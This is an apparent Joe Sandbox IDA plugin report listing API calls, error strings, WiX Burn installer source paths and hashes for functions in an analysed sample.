                                                                                                                                                                                                                                                                            • API String ID: 3168844106-105427012
                                                                                                                                                                                                                                                                            • Opcode ID: 4c8b41c37a1bdebf5d9cebb82016da8c352b7f2007314fc16c2e9b16b9875209
                                                                                                                                                                                                                                                                            • Instruction ID: 09412d1b4a1ec15ca2d4aa304042a8359e10444a1f9235c06ae067e35241e6b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c8b41c37a1bdebf5d9cebb82016da8c352b7f2007314fc16c2e9b16b9875209
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1101A171781A2A77D621A675AC49FA7B65CFB15750F114111F50DEA180E6B0F8008AF2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008EA9DA
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008EAA62
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get value as version for variable: %ls, xrefs: 008EAA40
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EAA52
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EAA14
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1616145386
                                                                                                                                                                                                                                                                            • Opcode ID: 40a382e7d4007c9aaf864eb3e9bab5bd147a3e75df64bc37f984ad826b951422
                                                                                                                                                                                                                                                                            • Instruction ID: aa07fc350142e8ad421f0c7b60669f98f97619dc526bb92e2dfb3a21d5dbc647
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a382e7d4007c9aaf864eb3e9bab5bd147a3e75df64bc37f984ad826b951422
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701E532981365BFCF219F81CD09F9E3AA5FB16B65F018120FE04EA1A1D771AD10DB95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008EA811
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008EA896
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get value as numeric for variable: %ls, xrefs: 008EA874
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA886
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA84B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1964378859
                                                                                                                                                                                                                                                                            • Opcode ID: c0f1ebe4c34c6aa6ac19abd8a7dcc6f4cf6e75382dfb1556f56a9d50b8bc65e4
                                                                                                                                                                                                                                                                            • Instruction ID: 520e0e0874d0beaf3efa2f36abdc7fec8e1ca42f14ab70b85b997c0db1fe0e87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0f1ebe4c34c6aa6ac19abd8a7dcc6f4cf6e75382dfb1556f56a9d50b8bc65e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7101A172A41264BBCF265F85CC0AF9E3A54FB16B65F104130BE18FA1A0D2B5AA119792
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E15D8
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • SetDefaultDllDirectories.KERNELBASE ref: 008E15FA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1600
                                                                                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 008E161D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E162B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2226491684-0
                                                                                                                                                                                                                                                                            • Opcode ID: c415a4760820c49f91d4df5ec6b1bc816f68fec514f791ee914fce4ec509ca62
                                                                                                                                                                                                                                                                            • Instruction ID: af53b435fd3037518631f6485552a685b721f82334c9910b5700db7d56988142
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c415a4760820c49f91d4df5ec6b1bc816f68fec514f791ee914fce4ec509ca62
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35018C36611125ABDF216F26DC0DD6E7B79FB92B507194019E815E7120C770A842DBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,008ED253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,008ED44C,00000001), ref: 008EA94D
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,008ED253,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,008ED44C), ref: 008EA9C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA9B1
                                                                                                                                                                                                                                                                            • Failed to get value of variable: %ls, xrefs: 008EA973
                                                                                                                                                                                                                                                                            • Failed to copy value of variable: %ls, xrefs: 008EA99F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3684767681
                                                                                                                                                                                                                                                                            • Opcode ID: 89282624824993bc8c34b749e919b0c5f8a498f3fcbaf2948820f706da11a778
                                                                                                                                                                                                                                                                            • Instruction ID: 5484f3d74b244a0ab14c8aa21e651fcae15e96e105cbf3481b4e01708c38171a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89282624824993bc8c34b749e919b0c5f8a498f3fcbaf2948820f706da11a778
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A01A732681258BBDF11AF55CC0AF9E3F58FF06B65F114010FD14F91A1D6B1AA109B95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00057AF8,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FB9FC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(E8057400,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA0D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFF71C,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA1E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(BD830005,00000000,008E80B3,?,008E77FE,008E87BB,?,008E80B3,?,?,?,?), ref: 008FBA30
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: c2d1a79fe74d531e7e21d0c5222a057d59d4e067feb98a2a58ec720bdc283d6a
                                                                                                                                                                                                                                                                            • Instruction ID: 3f634086dec51e2fd866e346f0a0842225189648af27bf477f504df6584c0aca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d1a79fe74d531e7e21d0c5222a057d59d4e067feb98a2a58ec720bdc283d6a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9012534002B14DFC7329F29D808A66BBF0FF51752F004A2DE296929A1C731A994EF92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,89504689,000000FF,?,000000FF,008E6DEA,00000000,008E6CF2,008E7162,008E6DEA,008E6EDE,00000000,00000000,008E6CF2,00000000), ref: 0091E6B7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: BA aborted detect forward compatible bundle.$Failed to compare bundle version '%ls' to related bundle version '%ls'$d:\a\wix4\wix4\src\burn\engine\detect.cpp
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900CB0, 00900CF3
                                                                                                                                                                                                                                                                            • Failed to copy provider key for compatible entry., xrefs: 00900C9E
                                                                                                                                                                                                                                                                            • Failed to get provider information for compatible package: %ls, xrefs: 00900CE1
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00947E27: lstrlenW.KERNEL32(?), ref: 00947EF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00947E27: lstrlenW.KERNEL32(00000000), ref: 00947F0A
                                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000000,?,00948702,?,00000000,HEAD,00000000,00000000,00948702,00000000,?,?,00000000,00000000), ref: 00947C79
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to connect to URL: %ls, xrefs: 00947C21
                                                                                                                                                                                                                                                                            • HEAD, xrefs: 00947C08
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00947C30
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Timelstrlen$FileSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to connect to URL: %ls$HEAD$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00946717
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 0094669E, 009466F8
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 009466EC
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946692
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,008F828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0093CD06
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,00951D1C,00000000,00000000,00000000,00000000,00000000), ref: 0094418A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to hash the string., xrefs: 0094414D
                                                                                                                                                                                                                                                                            • Invalid dictionary - bucket size index is out of range, xrefs: 0094410D
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 00944121
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(008E6EDE,008E6DEA,008E6DA2,8351EC8B,5300FC65,F6B70F0B,008E6DEA,008E6D72,008E7172,008E6D72,008E6ECA,008E6EDE,008E7162,008E6DEA,008E6EDE,00000000), ref: 00947556
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                              • Part of subcall function 0094729B: RegCloseKey.ADVAPI32(00000000,00020019,?,?,008E6E9A,00000001,008E6DEA), ref: 00947376
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to query 64-bit related bundles., xrefs: 009475E3
                                                                                                                                                                                                                                                                            • Failed to query 32-bit related bundles., xrefs: 009475B6
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 009475F2
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,008F713E,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 0093D707
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read value type: %ls/@%ls, xrefs: 0093D6E1
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093D6B3, 0093D6F0
                                                                                                                                                                                                                                                                            • Failed to open key: %ls, xrefs: 0093D6A4
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
                                                                                                                                                                                                                                                                            • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,009003A0,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 008F5D26
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to copy the property value., xrefs: 008F5D5A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\package.cpp, xrefs: 008F5D6C
                                                                                                                                                                                                                                                                            • IGNOREDEPENDENCIES, xrefs: 008F5CDD
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix4\wix4\src\burn\engine\package.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-2032719239
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0094E860,000000FF,00000000,00000002,?,?,009263B6,00000000,?,?,?), ref: 00926165
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(0094E860,?,009263B6,00000000,?,?,?), ref: 009261FB
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for message data$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2993511968-954368992
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5, 008F9959
                                                                                                                                                                                                                                                                            • Failed to create registration key., xrefs: 008F912A
                                                                                                                                                                                                                                                                            • Failed to cache bundle from path: %ls, xrefs: 008F90E3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to cache bundle from path: %ls$Failed to create registration key.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2361216137
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000001), ref: 00940466
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed XmlGetAttribute, xrefs: 009403FC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0094040B
                                                                                                                                                                                                                                                                            • Failed to treat attribute value as UInt64., xrefs: 00940435
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                                                                                                                            • String ID: Failed to treat attribute value as UInt64.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                                                                                                                                            • API String ID: 3379191133-2593243594
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,008FC427,?,?,00000004,?,00000004), ref: 009434F1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008FC427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009434FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                            • String ID: Failed to read data from file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1948546556-2736598211
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,008F7102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 0093CB9B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093CB48, 0093CB84
                                                                                                                                                                                                                                                                            • Failed to open key: %ls, xrefs: 0093CB39
                                                                                                                                                                                                                                                                            • Failed to read value: %ls/@%ls, xrefs: 0093CB75
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
